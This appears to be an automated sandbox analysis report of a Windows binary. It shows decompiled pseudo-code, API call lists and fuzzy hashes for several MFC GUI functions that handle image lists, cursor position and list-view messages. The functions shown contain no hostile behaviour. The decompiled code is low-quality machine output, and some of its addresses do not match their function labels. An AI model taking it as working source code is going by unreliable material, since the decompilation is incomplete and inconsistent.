Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2408$#2096#384#823H_prolog
String ID:
API String ID: 303503419-0
Opcode ID: f4ca25dfec6af561e6642688bfe81fb71fc60953fe784e06ae69e8abfd7ea63e
Instruction ID: eacd625b12e5354ad8618697d9eb0043fe24ab968e75b139f950bd97322ff056
Opcode Fuzzy Hash: f4ca25dfec6af561e6642688bfe81fb71fc60953fe784e06ae69e8abfd7ea63e
Instruction Fuzzy Hash: 32210E31300700AFC764AF96D941B9BB7B1BF44754F51442FB9469B691CF79E840CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0041849C, Relevance: 9.1, APIs: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041849C(void* __ecx) {
				void* _t23;
				void* _t27;
				intOrPtr _t39;
				void* _t45;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_t39 =  *((intOrPtr*)(_t45 + 0x18));
				_t42 = __ecx;
				if(_t39 == 0) {
					_t23 = L004021CB(__ecx,  *((intOrPtr*)(_t45 + 8)),  *((intOrPtr*)(_t45 + 0x14)),  *((intOrPtr*)(_t45 + 0xc)),  *((intOrPtr*)(_t45 + 0x10)), 0, 0);
				} else {
					L00425F8E();
					_push(1);
					_push(1);
					_push(0xff);
					_push( *0x440d0c);
					 *(_t45 - 4) = 0;
					_push( *0x440d08);
					L00426000();
					if( *((intOrPtr*)(__ecx + 0x34)) == 0) {
						_push(GetSysColor(0xf));
					} else {
						_push( *((intOrPtr*)(__ecx + 0x30)));
					}
					ImageList_AddMasked( *(_t45 - 0x10),  *(_t39 + 4), ??);
					_t27 = L004021CB(_t42,  *((intOrPtr*)(_t45 + 8)),  *((intOrPtr*)(_t45 + 0x14)),  *((intOrPtr*)(_t45 + 0xc)),  *((intOrPtr*)(_t45 + 0x10)), _t45 - 0x14, 0);
					 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
					L00425FB2();
					_t23 = _t27;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t23;
			}

0x004184a1
0x004184a6
0x004184a7
0x004184ab
0x004184b0
0x004184b4
0x00418537
0x004184b6
0x004184b9
0x004184be
0x004184c0
0x004184c2
0x004184ca
0x004184d0
0x004184d3
0x004184d9
0x004184e1
0x004184f0
0x004184e3
0x004184e3
0x004184e3
0x004184f7
0x00418510
0x00418515
0x0041851e
0x00418523
0x00418523
0x00418542
0x0041854a

APIs

_EH_prolog.MSVCRT ref: 004184A1
#384.MFC42 ref: 004184B9
#2096.MFC42(000000FF,00000001,00000001), ref: 004184D9
GetSysColor.USER32(0000000F), ref: 004184EA
ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 004184F7
#686.MFC42(?,?,?,?,?,00000000), ref: 0041851E

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2096#384#686ColorH_prologImageList_Masked
String ID:
API String ID: 1512221878-0
Opcode ID: 9e1879a49e85bffdacf4cae1b113e5ec98be88a41fbbcab445adede0be4eec1d
Instruction ID: f502fb21fc9c93283f38f2a808fab5ccac6a285d71e152e6c0545792cd2d23dc
Opcode Fuzzy Hash: 9e1879a49e85bffdacf4cae1b113e5ec98be88a41fbbcab445adede0be4eec1d
Instruction Fuzzy Hash: BA11AC7660011AFFCF119F91DE85EAEBB36FB08358F00402EF605661A0CB759E61EB24

Uniqueness

Uniqueness Score: -1.00%

Function 004182C5, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004182CA
#384.MFC42 ref: 004182E2
#2096.MFC42(000000FF,00000001,00000001), ref: 00418302
GetSysColor.USER32(0000000F), ref: 00418313
ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00418320
#686.MFC42(?,?,?,?,00000000), ref: 00418344

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2096#384#686ColorH_prologImageList_Masked
String ID:
API String ID: 1512221878-0
Opcode ID: dec6006652522906cc1ae7c27ed2c02f13ec90616e6378cdaa42e69903113500
Instruction ID: e6eaa06e397fe8dc966d93e6a05a9b87fffa7749360d4d205c2bb3366922cf4c
Opcode Fuzzy Hash: dec6006652522906cc1ae7c27ed2c02f13ec90616e6378cdaa42e69903113500
Instruction Fuzzy Hash: 9211DD76A00119FFCF119F91DD85EEEBB76FB08754F40402EBA16621A1CB369D50EB24

Uniqueness

Uniqueness Score: -1.00%

Function 0041512C, Relevance: 9.1, APIs: 6, Instructions: 58COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00415131
#384.MFC42 ref: 00415149
#2096.MFC42(000000FF,00000001,00000001), ref: 00415169
GetSysColor.USER32(0000000F), ref: 0041517A
ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00415187
#686.MFC42(?,?,?,00000000), ref: 004151A8

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2096#384#686ColorH_prologImageList_Masked
String ID:
API String ID: 1512221878-0
Opcode ID: 1394e6bc46925ba53dba922a39465b54f66c1c8a4f1d7ca86dff3472242dd8b6
Instruction ID: a6e8a59405af25c5b9806b834d579ac4f6b985fe472341beb62160fa5672521d
Opcode Fuzzy Hash: 1394e6bc46925ba53dba922a39465b54f66c1c8a4f1d7ca86dff3472242dd8b6
Instruction Fuzzy Hash: 5011EC71A00119FFCF119F91DD85EEEBB35FB44398F00013AB505621A0C7355E90DB28

Uniqueness

Uniqueness Score: -1.00%

Function 0041F404, Relevance: 9.1, APIs: 6, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041F404(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct tagPOINT _v12;
				int _t13;
				void* _t15;
				void* _t18;
				void* _t22;
				void* _t24;
				int _t28;
				void* _t35;

				_push(__ecx);
				_push(__ecx);
				_t35 = __ecx;
				if(_a4 != 1) {
					L11:
					return _t13;
				}
				_t15 = _a8 - 0x7b;
				if(_t15 == 0) {
					L10:
					GetCursorPos( &_v12);
					_t13 = L004013E3(_t35, _v12.x, _v12.y);
					goto L11;
				}
				_t18 = _t15 - 0x185;
				if(_t18 == 0) {
					L7:
					GetCursorPos( &_v12);
					_t13 = ClientToScreen( *(_t35 + 0x20),  &_v12);
					goto L11;
				}
				_t22 = _t18 - 1;
				if(_t22 == 0) {
					goto L7;
				}
				_t24 = _t22;
				if(_t24 == 0) {
					GetCursorPos( &_v12);
					_t13 = ClientToScreen( *(_t35 + 0x20),  &_v12);
					if( *((intOrPtr*)(_t35 + 0xc0)) != 0) {
						_push(5);
						L00425E14();
						_t13 = L00401CB2(_t35);
					}
					goto L11;
				}
				_t28 = _t24 - 1;
				if(_t28 == 0) {
					goto L10;
				}
				_t13 = _t28;
				if(_t13 != 0) {
					goto L11;
				}
				goto L7;
			}

0x0041f407
0x0041f408
0x0041f40e
0x0041f410
0x0041f491
0x0041f493
0x0041f493
0x0041f415
0x0041f418
0x0041f47a
0x0041f47e
0x0041f48c
0x00000000
0x0041f48c
0x0041f41a
0x0041f41f
0x0041f42f
0x0041f433
0x0041f440
0x00000000
0x0041f440
0x0041f421
0x0041f422
0x00000000
0x00000000
0x0041f425
0x0041f426
0x0041f44c
0x0041f459
0x0041f466
0x0041f468
0x0041f46c
0x0041f473
0x0041f473
0x00000000
0x0041f466
0x0041f428
0x0041f429
0x00000000
0x00000000
0x0041f42c
0x0041f42d
0x00000000
0x00000000
0x00000000

APIs

GetCursorPos.USER32(00000001), ref: 0041F433
ClientToScreen.USER32(?,00000001), ref: 0041F440
GetCursorPos.USER32(00000001), ref: 0041F44C
ClientToScreen.USER32(?,00000001), ref: 0041F459
#6215.MFC42(00000005), ref: 0041F46C
GetCursorPos.USER32(00000001), ref: 0041F47E

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$ClientScreen$#6215
String ID:
API String ID: 3078493503-0
Opcode ID: 6b86c443fc533cb8e202fe1aecf4a3a63d6d5c95b2d03847363c397c5fae40ac
Instruction ID: 345d8d01bc5c354f4d9fae1e77cb4dc017b06733c560b6f4d4ee91dbcb49e9c3
Opcode Fuzzy Hash: 6b86c443fc533cb8e202fe1aecf4a3a63d6d5c95b2d03847363c397c5fae40ac
Instruction Fuzzy Hash: D511A135110918AFDF14EBA0DC48AEF7BB8FB54305F40013AE442D2160DB3C9E8ACB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401726, Relevance: 9.1, APIs: 6, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00401726(void* __ecx) {
				long _t30;
				intOrPtr _t34;
				void* _t39;
				signed int _t44;
				void* _t55;

				L004269E6();
				_t39 = __ecx;
				 *((intOrPtr*)(_t55 - 0x20)) =  *((intOrPtr*)(_t55 + 8));
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				 *(_t55 - 0x24) = 2;
				_t30 = SendMessageA( *(__ecx + 0x134), 0x100d, 0xffffffff, _t55 - 0x24);
				if(_t30 == 0xffffffff) {
					_t44 = 0xa;
					memset(_t55 - 0x4c, 0, _t44 << 2);
					 *(_t55 - 0x4c) = 3;
					 *((intOrPtr*)(_t55 - 0x30)) =  *((intOrPtr*)(_t55 + 0xc));
					_t34 =  *((intOrPtr*)(_t55 + 8));
					_push( *((intOrPtr*)(_t34 - 8)));
					L0042601E();
					 *((intOrPtr*)(_t55 - 0x38)) = _t34;
					_push(0xffffffff);
					 *((intOrPtr*)(_t55 - 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t55 + 8)) - 8));
					L00426018();
					_t30 = SendMessageA( *(_t39 + 0x134), 0x1007, 0, _t55 - 0x4c);
				}
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return _t30;
			}

0x0040aae4
0x0040aaee
0x0040aaf9
0x0040aafc
0x0040ab03
0x0040ab18
0x0040ab1d
0x0040ab22
0x0040ab28
0x0040ab2d
0x0040ab34
0x0040ab37
0x0040ab3d
0x0040ab40
0x0040ab45
0x0040ab4b
0x0040ab53
0x0040ab56
0x0040ab6c
0x0040ab6e
0x0040ab6f
0x0040ab76
0x0040ab80
0x0040ab88

APIs

_EH_prolog.MSVCRT ref: 0040AAE4
SendMessageA.USER32 ref: 0040AB18
#2915.MFC42(?), ref: 0040AB40
#5572.MFC42(000000FF,?), ref: 0040AB56
SendMessageA.USER32 ref: 0040AB6C
#800.MFC42 ref: 0040AB76

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$#2915#5572#800H_prolog
String ID:
API String ID: 145943066-0
Opcode ID: d2a3b750eaf3cf991f61f7c0172748e9fcc0b645bb1d052b35d748222e45a20c
Instruction ID: bee963ea98858373e2e9a6ecbdb4f4bf9067296dac49b0c7338e024051788721
Opcode Fuzzy Hash: d2a3b750eaf3cf991f61f7c0172748e9fcc0b645bb1d052b35d748222e45a20c
Instruction Fuzzy Hash: 4F114F31A00218AFCF00DF94D985BDCBBB4EF08364F10826AF925AB2D0D7749A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0A1, Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040D0A1(void* __ecx, void* __eflags) {
				void* _t24;
				void* _t36;
				intOrPtr _t38;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t36 - 0x10)) = _t38;
				_push(_t36 + 0x14);
				 *(_t36 - 4) = 1;
				L0042611A();
				_push( *((intOrPtr*)(_t36 + 0x10)));
				 *(_t36 - 4) = 2;
				_push(_t38);
				 *((intOrPtr*)(_t36 + 0x10)) = _t38;
				L0042611A();
				 *((intOrPtr*)(_t36 - 0x14)) = _t38;
				 *(_t36 - 4) = 3;
				L00425FE2();
				 *(_t36 - 4) = 1;
				_t24 = E00401A8C( *((intOrPtr*)(__ecx + 0x36c)), _t38, 0x8067, _t38, _t36 + 0xc);
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				L00425DFC();
				 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t24;
			}

0x0040d0a6
0x0040d0ab
0x0040d0ac
0x0040d0b0
0x0040d0b6
0x0040d0b9
0x0040d0ba
0x0040d0c1
0x0040d0c6
0x0040d0cc
0x0040d0d0
0x0040d0d3
0x0040d0d7
0x0040d0e2
0x0040d0eb
0x0040d0ef
0x0040d0fa
0x0040d0fe
0x0040d103
0x0040d10a
0x0040d10f
0x0040d116
0x0040d11f
0x0040d127

APIs

_EH_prolog.MSVCRT ref: 0040D0A6
#535.MFC42(?), ref: 0040D0C1
#535.MFC42(?,?,?,?), ref: 0040D0D7
#2819.MFC42(?,00008067,?,?,?,?,?), ref: 0040D0EF

Part of subcall function 00401A8C: _EH_prolog.MSVCRT ref: 0040A3AD
Part of subcall function 00401A8C: #3998.MFC42(00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 0040A3D2
Part of subcall function 00401A8C: #2915.MFC42(?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 0040A3ED
Part of subcall function 00401A8C: #5572.MFC42(000000FF,?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 0040A3FA
Part of subcall function 00401A8C: SendMessageA.USER32 ref: 0040A433
Part of subcall function 00401A8C: #2915.MFC42(?), ref: 0040A44F
Part of subcall function 00401A8C: #5572.MFC42(000000FF,?), ref: 0040A45C
Part of subcall function 00401A8C: SendMessageA.USER32 ref: 0040A47D
Part of subcall function 00401A8C: #800.MFC42 ref: 0040A486
Part of subcall function 00401A8C: #800.MFC42 ref: 0040A491
Part of subcall function 00401A8C: #800.MFC42 ref: 0040A49D

#800.MFC42(?,?,?), ref: 0040D10A
#800.MFC42(?,?,?), ref: 0040D116

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#2915#535#5572H_prologMessageSend$#2819#3998
String ID:
API String ID: 3552496044-0
Opcode ID: 6ea5d162e2b42d1c6c8cecfebafc68a547011b39fee3aa08d2ae0001be75c8f2
Instruction ID: 46f56b20b3a8a0202f9ae6a6874d8c96c2a3ed101d26dedd730dfe8b363ab5f3
Opcode Fuzzy Hash: 6ea5d162e2b42d1c6c8cecfebafc68a547011b39fee3aa08d2ae0001be75c8f2
Instruction Fuzzy Hash: 1601C070A10258BFCB04DF54D906BEE7BA8AB04318F00814EB452632C2DBB85B14CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004022C5, Relevance: 9.0, APIs: 6, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E004022C5(void* __ecx, intOrPtr _a4) {
				void* _t11;
				intOrPtr _t13;

				_t13 = _a4;
				_push(__ecx + 0x90);
				_push(0x3ed);
				_push(_t13);
				L0042622E();
				_push(__ecx + 0xd0);
				_push(0x3e9);
				_push(_t13);
				L0042622E();
				_push(__ecx + 0x110);
				_push(0x3eb);
				_push(_t13);
				L0042622E();
				_push(__ecx + 0x150);
				_push(0x3ec);
				_push(_t13);
				L0042622E();
				_t11 = __ecx + 0x190;
				_push(_t11);
				_push(0x3ef);
				_push(_t13);
				L0042622E();
				_push(__ecx + 0x1d0);
				_push(0x3f1);
				_push(_t13);
				L0042622E();
				return _t11;
			}

0x0040ba8a
0x0040ba94
0x0040ba95
0x0040ba9a
0x0040ba9b
0x0040baa6
0x0040baa7
0x0040baac
0x0040baad
0x0040bab8
0x0040bab9
0x0040babe
0x0040babf
0x0040baca
0x0040bacb
0x0040bad0
0x0040bad1
0x0040bad6
0x0040badc
0x0040badd
0x0040bae2
0x0040bae3
0x0040baee
0x0040baef
0x0040baf4
0x0040baf5
0x0040bafc

APIs

#2302.MFC42(?,000003ED,?), ref: 0040BA9B
#2302.MFC42(?,000003E9,?,?,000003ED,?), ref: 0040BAAD
#2302.MFC42(?,000003EB,?,?,000003E9,?,?,000003ED,?), ref: 0040BABF
#2302.MFC42(?,000003EC,?,?,000003EB,?,?,000003E9,?,?,000003ED,?), ref: 0040BAD1
#2302.MFC42(?,000003EF,?,?,000003EC,?,?,000003EB,?,?,000003E9,?,?,000003ED,?), ref: 0040BAE3
#2302.MFC42(?,000003F1,?,?,000003EF,?,?,000003EC,?,?,000003EB,?,?,000003E9,?,?), ref: 0040BAF5

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2302
String ID:
API String ID: 735948377-0
Opcode ID: 64ef9fae020332b7ce41be1ad2f47ddca67fef480b3668693ff9022de10d2ed8
Instruction ID: e0fe6edfc1298a628144dcdce24d04e2068057daaf47d048b8f0836aed51fe24
Opcode Fuzzy Hash: 64ef9fae020332b7ce41be1ad2f47ddca67fef480b3668693ff9022de10d2ed8
Instruction Fuzzy Hash: A2F09635200110BBE312F651FCC2FFF67AC9B85B05F45082FBA94A50C5CFA8251163B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041F736, Relevance: 9.0, APIs: 6, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041F736(intOrPtr __ecx) {
				void* _t33;

				L004269E6();
				_push(__ecx);
				 *((intOrPtr*)(_t33 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42c4fc;
				 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
				L00425E08();
				 *(_t33 - 4) = 1;
				L00425E08();
				 *(_t33 - 4) = 2;
				L00425E08();
				 *(_t33 - 4) = 3;
				L00425E08();
				 *(_t33 - 4) = 4;
				L00425E08();
				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				 *(__ecx + 0x14) =  *(__ecx + 0x14) & 0x00000000;
				 *(__ecx + 0x1c) =  *(__ecx + 0x1c) & 0x00000000;
				 *((intOrPtr*)(__ecx)) = 0x42eedc;
				 *((intOrPtr*)(__ecx + 0x20)) = 5;
				 *[fs:0x0] =  *((intOrPtr*)(_t33 - 0xc));
				return __ecx;
			}

0x0041f73b
0x0041f740
0x0041f744
0x0041f747
0x0041f74d
0x0041f754
0x0041f75c
0x0041f760
0x0041f768
0x0041f76c
0x0041f774
0x0041f778
0x0041f780
0x0041f784
0x0041f789
0x0041f78d
0x0041f795
0x0041f799
0x0041f79f
0x0041f7a9
0x0041f7b1

APIs

_EH_prolog.MSVCRT ref: 0041F73B
#540.MFC42 ref: 0041F754
#540.MFC42 ref: 0041F760
#540.MFC42 ref: 0041F76C
#540.MFC42 ref: 0041F778
#540.MFC42 ref: 0041F784

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #540$H_prolog
String ID:
API String ID: 385474894-0
Opcode ID: 0cf93aec874a280c79cc018d1db967ef3cd6c2a71d845525415fa6d9d32c6bcb
Instruction ID: be9696e77a6136ef8a7d87fbacd05f1f46659780fa80c1dded3611ef1f4ea2f8
Opcode Fuzzy Hash: 0cf93aec874a280c79cc018d1db967ef3cd6c2a71d845525415fa6d9d32c6bcb
Instruction Fuzzy Hash: 6701A271A04B60CFD720DF55D11539AF7F4AF14318F41895ED09663A82DBB8AB08CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3ED, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040E3ED(intOrPtr __ecx) {
				void* _t21;

				L004269E6();
				_push(__ecx);
				_push(0x66);
				 *((intOrPtr*)(_t21 - 0x10)) = __ecx;
				L00426480();
				 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
				L004260F6();
				 *((intOrPtr*)(__ecx + 0x80)) = 0x42ced0;
				 *(_t21 - 4) = 1;
				L004260F6();
				 *((intOrPtr*)(__ecx + 0xc0)) = 0x42d834;
				 *((intOrPtr*)(__ecx)) = 0x42d6ec;
				 *[fs:0x0] =  *((intOrPtr*)(_t21 - 0xc));
				return __ecx;
			}

0x0040e3f2
0x0040e3f7
0x0040e3fc
0x0040e3fe
0x0040e401
0x0040e406
0x0040e412
0x0040e417
0x0040e423
0x0040e429
0x0040e431
0x0040e437
0x0040e441
0x0040e449

APIs

_EH_prolog.MSVCRT ref: 0040E3F2
#364.MFC42(00000066), ref: 0040E401
#567.MFC42(00000066), ref: 0040E412
#567.MFC42(00000066), ref: 0040E429

Strings

zdB, xrefs: 0040E431

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
